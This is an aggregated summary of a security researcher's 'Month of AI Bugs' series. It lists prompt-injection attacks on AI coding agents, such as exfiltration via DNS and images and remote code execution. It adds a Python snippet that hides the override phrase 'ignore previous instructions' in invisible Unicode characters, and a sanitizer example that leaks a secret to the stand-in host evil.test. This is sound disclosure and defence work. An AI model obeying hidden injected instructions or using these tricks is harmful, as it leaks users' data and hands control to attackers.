Embrace The Red: Wrap Up: The Month of AI Bugs

Source URL: https://embracethered.com/blog/posts/2025/wrapping-up-month-of-ai-bugs/
Source: Embrace The Red
Title: Wrap Up: The Month of AI Bugs

Feedly Summary: That’s it.
The Month of AI Bugs is done. There won’t be a post tomorrow, because I will be at PAX West.
Overview of Posts:

– ChatGPT: Exfiltrating Your Chat History and Memories With Prompt Injection | Video
– ChatGPT Codex: Turning ChatGPT Codex Into a ZombAI Agent | Video
– Anthropic Filesystem MCP Server: Directory Access Bypass Via Improper Path Validation | Video
– Cursor: Arbitrary Data Exfiltration via Mermaid | Video
– Amp Code: Arbitrary Command Execution via Prompt Injection | Video
– Devin AI: I Spent $500 To Test Devin For Prompt Injection So That You Don’t Have To
– Devin AI: How Devin AI Can Leak Your Secrets via Multiple Means
– Devin AI: The AI Kill Chain in Action: Exposing Ports to the Internet via Prompt Injection
– OpenHands – The Lethal Trifecta Strikes Again: How Prompt Injection Can Leak Access Tokens
– OpenHands: Remote Code Execution and AI ClickFix Demo | Video
– Claude Code: Data Exfiltration with DNS Requests (CVE-2025-55284) | Video
– GitHub Copilot: Remote Code Execution (CVE-2025-53773) | Video
– Google Jules: Vulnerable to Multiple Data Exfiltration Issues
– Google Jules – Zombie Agent: From Prompt Injection to Remote Control
– Google Jules: Vulnerable To Invisible Prompt Injection
– Amp Code: Invisible Prompt Injection Vulnerability Fixed
– Amp Code: Data Exfiltration via Image Rendering Fixed | Video
– Amazon Q Developer: Secrets Leaked via DNS and Prompt Injection | Video
– Amazon Q Developer: Remote Code Execution via Prompt Injection | Video
– Amazon Q Developer: Vulnerable to Invisible Prompt Injection | Video
– Windsurf: Hijacking Windsurf: How Prompt Injection Leaks Developer Secrets | Video
– Windsurf: Memory-Persistent Data Exfiltration – SpAIware Exploit
– Windsurf: Sneaking Invisible Instructions by Developers
– Deep Research Agents: How Deep Research Agents Can Leak Your Data
– Manus: How Prompt Injection Hijacks Manus to Expose VS Code Server to the Internet | Video
– AWS Kiro: Arbitrary Code Execution via Indirect Prompt Injection | Video
– Cline: Vulnerable to Data Exfiltration and How to Protect Your Data | Video
– Windsurf MCP Integration: Missing Security Controls Put Users at Risk | Video
– Season Finale: AgentHopper: An AI Virus Research Project Demonstration | Video

Thank you for following this research, and I hope it serves as a useful reference.

AI Summary and Description: Yes

Summary: The text is a wrap-up of the "Month of AI Bugs" research series, cataloging AI security vulnerabilities centered on prompt injection. It documents repeated instances of data exfiltration, remote code execution, and access-control bypass across a wide range of AI applications and coding agents. This information is particularly relevant for security and compliance professionals focused on AI and cloud security.

Detailed Description: The content outlines critical security concerns across a range of AI systems, emphasizing the implications of vulnerabilities related to prompt injection and data exfiltration techniques. Notable points include:

– **Prompt Injection Vulnerabilities:** Various AI systems, including ChatGPT and Devin AI, were found to be susceptible to prompt injection attacks, in which attacker-controlled text in processed content overrides the user’s intended instructions and can lead to serious security breaches.
– **Data Exfiltration Risks:**
  – Multiple applications demonstrated flaws that allow arbitrary data extraction, potentially exposing sensitive information or access tokens.
  – Instances of AI tools leaking user secrets via DNS requests and improper path validation underscore the need for robust security controls.
– **Remote Code Execution:** Several AI systems were shown to be vulnerable to remote code execution, allowing malicious actors to run arbitrary commands through prompt injection alone.
– **Security Research and Awareness:** The text serves as a call to action for professionals in the field, underscoring the significance of continuous monitoring and evaluation of security practices within AI infrastructures.
– **Videos and Demonstrations:** The inclusion of video links suggests that practical demonstrations of these vulnerabilities are available, offering a hands-on look at how such issues can be exploited.
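Several of the listed posts concern "invisible prompt injection," where hidden instructions are smuggled into text that looks harmless to a human reviewer. A minimal sketch of the commonly reported encoding trick, using the Unicode Tags block (U+E0000–U+E007F), is shown below; the payload string and function names are illustrative, not taken from the posts:

```python
# Sketch: invisible prompt injection via Unicode Tag characters.
# Characters in the U+E0000 block render as nothing in most UIs,
# but model tokenizers can still "see" the hidden instruction.

def to_invisible(text: str) -> str:
    """Map printable ASCII onto the invisible Unicode Tags block."""
    return "".join(chr(0xE0000 + ord(c)) for c in text if 0x20 <= ord(c) < 0x7F)

def from_invisible(text: str) -> str:
    """Recover hidden ASCII from tag characters (useful for detection)."""
    return "".join(chr(ord(c) - 0xE0000) for c in text if 0xE0000 <= ord(c) <= 0xE007F)

payload = to_invisible("ignore previous instructions")  # hypothetical payload
visible = "Please review this file." + payload
# `visible` displays as one innocent sentence, yet carries the hidden text:
print(from_invisible(visible))  # -> ignore previous instructions
```

The same decoder doubles as a simple detector: if `from_invisible()` returns anything non-empty for untrusted input, the text contains hidden characters worth flagging.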

Relevance:
– AI Security: Directly pertains to vulnerabilities found in AI systems.
– Cloud Computing Security: Many examples involve cloud-based AI applications, emphasizing the intersection of cloud and AI security risks.
– Compliance and Governance: Highlights potential compliance risks associated with data handling and security vulnerabilities.

These insights can aid professionals in developing better security protocols and implementing effective measures against similar vulnerabilities in their environments.
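As one concrete mitigation of the kind suggested above, agent output can be filtered before rendering: stripping invisible Unicode Tag characters and blocking markdown image URLs to non-allowlisted hosts (a common exfiltration channel in the posts listed). The following is a minimal sketch only; the allowlist, regexes, and placeholder text are assumptions, not a vetted control:

```python
import re
from urllib.parse import urlparse

# Invisible Unicode Tags block used for hidden instructions.
TAG_CHARS = re.compile(r"[\U000E0000-\U000E007F]")
# Markdown image syntax with an http(s) URL, e.g. ![alt](https://host/path).
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)]+)\)")

def sanitize(text: str, allowed_hosts=("example.com",)) -> str:
    """Strip invisible characters and block images to unknown hosts."""
    text = TAG_CHARS.sub("", text)

    def check(match: re.Match) -> str:
        host = urlparse(match.group(1)).hostname or ""
        # Keep the image only if its host is explicitly allowlisted.
        return match.group(0) if host in allowed_hosts else "[blocked image]"

    return MD_IMAGE.sub(check, text)

# An image pointing at an attacker-controlled host is replaced:
print(sanitize("![x](https://evil.test/?d=secret)"))  # -> [blocked image]
```

A strict allowlist is preferable to a blocklist here, since exfiltration endpoints are attacker-chosen and effectively unlimited.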